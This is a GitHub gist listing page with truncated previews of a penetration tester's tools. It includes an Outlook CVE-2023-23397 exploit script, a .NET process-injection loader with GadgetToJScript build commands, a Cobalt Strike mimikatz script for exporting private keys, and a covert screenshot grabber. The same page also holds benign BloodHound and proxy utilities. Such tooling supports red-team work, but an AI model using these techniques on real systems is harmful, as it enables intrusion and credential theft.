
@tothi
tothi / bh_split2.py
Last active October 3, 2023 17:45 — forked from Acebond/bh_split2.py
Split large SharpHound datasets (JSON files) into smaller files that can more easily be imported into BloodHound. Especially useful because of the Electron memory limitations and the 1GB file-size limit of BloodHound CE (running in the browser).
#!/usr/bin/python3
# Based on https://gist.github.com/deltronzero/7c23bacf97b4b61c7a2f2950ef6f35d8
# updated to current BloodHound JSON format (compatible with SharpHound 2.x and BloodHound CE)
# pip install simplejson
import simplejson
import sys
def splitfile(file_name, object_limit):
    print(f"[*] Loading {file_name}")
    with open(file_name) as f:
tothi / PrtSc_Screenshotter.ps1
Created September 16, 2023 20:00
Capture screenshot by sending PrtSc key using PowerShell and grab it through HTTP with a Python CGI receiver
# dependency
Add-Type -AssemblyName System.Windows.Forms
# send PrtSc key (= capture the screen to the clipboard)
[Windows.Forms.Sendkeys]::SendWait("{PrtSc}")
# save the image as PNG in memory
$png = New-Object System.IO.MemoryStream
[Windows.Forms.Clipboard]::GetImage().Save($png, [System.Drawing.Imaging.ImageFormat]::Png)
tothi / kali-fde-tpm.md
Last active June 30, 2023 15:03
Full Disk Encryption with unattended auto-unlock using TPM2; hardened with Secure Boot on Kali

Full Disk Encryption w/ TPM2 on Kali

Short HOWTO about setting up Full Disk Encryption with unattended auto-unlock using TPM2 on Kali.

Useful for rogue devices (auto-connecting to C2), headless pentest boxes, etc. storing confidential information but lacking physical security.

NOTE: In order to maintain integrity and protect the encryption key, hardening the boot process with Secure Boot is a must. To make Secure Boot work (without messing up the default UEFI keys stored in the hardware), the Microsoft-signed UEFI shim loader is used (available in the Kali repo), which is able to securely load an arbitrary ELF image as 2nd stage

tothi / config.nims
Last active May 13, 2023 12:21
Nim config script for making Nim build compatible with Mingw-w64 (useful on ArchLinux setups because the defaults there break things)
# original idea: https://github.com/nim-lang/Nim/issues/20007#issue-1300915309
# use case for https://github.com/chvancooten/NimPlant
# - put this config.nims into NimPlant/client folder and build should work without errors on ArchLinux also
import std/strutils
import std/sequtils
# remove -fstack-clash-protection
switch("gcc.options.always", replace(get("gcc.options.always"), "-fstack-clash-protection", ""))
tothi / msmq_detect.py
Created April 17, 2023 00:09
Detect whether the remote MSMQ service on 1801/tcp is enabled or not by sending a valid message to the target
#!/usr/bin/env python3
#
# detect whether the remote MSMQ service on 1801/tcp is enabled or not
# by sending a valid message to the target
#
# resources:
# https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqmq/b7cc2590-a617-45df-b6a3-1f31102b36fb
# https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqqb/85498b96-f2c8-43b3-a108-c9d6269dc4af
#
tothi / PidLidReminderPwn.py
Created March 28, 2023 09:30
Exploiting Outlook CVE-2023-23397 using Python by sending the message through EWS
#!/usr/bin/python -u
from exchangelib import Credentials, Configuration, Account, DELEGATE, Message, Mailbox, ExtendedProperty
from exchangelib.ewsdatetime import EWSDateTime, EWSTimeZone, UTC_NOW
from exchangelib.protocol import BaseProtocol, NoVerifyHTTPAdapter
BaseProtocol.HTTP_ADAPTER_CLS = NoVerifyHTTPAdapter
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
tothi / openssl-legacy-md4.md
Last active September 4, 2023 12:51
/etc/ssl/openssl.cnf supporting legacy digests like MD4 (useful for offensive tools requiring NTLM support)

This is a minimal /etc/ssl/openssl.cnf supporting legacy algorithms on modern OpenSSL installations, where they are disabled by default.

The marked (######) lines should be added to your openssl.cnf (other parts may be unchanged).

To check whether the legacy provider has been enabled successfully:

$ openssl list -providers
Providers:
tothi / DInjectQueuerAPC.cs
Last active October 2, 2023 22:35 — forked from jfmaes/DInjectQueuerAPC.cs
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
/// Using with GadgetToJScript (e.g. for VBS payload):
/// 1.) compile to DLL: c:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:DInjectQueuerAPC.dll /r:System.Net.Http.dll DInjectQueuerAPC.cs
/// 2.) generate VBS: GadgetToJScript.exe -w vbs -b -o DInjectQueuerAPC -a DInjectQueuerAPC.dll
/// 3.) test: cscript.exe DInjectQueuerAPC.vbs
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using System.Threading.Tasks;
tothi / mmimikatz.cna
Last active November 13, 2022 13:51
multi-command mimikatz functionality in a Cobalt Strike beacon
#
# multi-command mimikatz in a Cobalt Strike beacon extending the built-in mimikatz functionality
#
# cmd separator is |
#
# practical example: export machine certificates (including non-exportable private key :)):
#
# mmimikatz "crypto::capi|crypto::certificates /systemstore:local_machine /store:my /export"
#
tothi / mitmproxy-jwt-refresh-addon.py
Created August 28, 2022 20:52
mitmproxy addon for handling oauth access and refresh tokens automatically
# run: mitmproxy -k -p 8090 -s mitmproxy-jwt-refresh-addon.py
# set burp upstream proxy to localhost:8090
#
# use case:
# - application authorization is implemented by OAuth 2.0
# - testing is performed using Burp as primary and mitmproxy as upstream proxy
# - mitmproxy takes care of the Authorization tokens using this addon
# - user gets an access_token and a refresh_token during the 1st login (e.g. password login)
# - mitmproxy addon caches access_token and refresh_token
# - mitmproxy addon adds Authorization: Bearer [access_token from cache] header for every request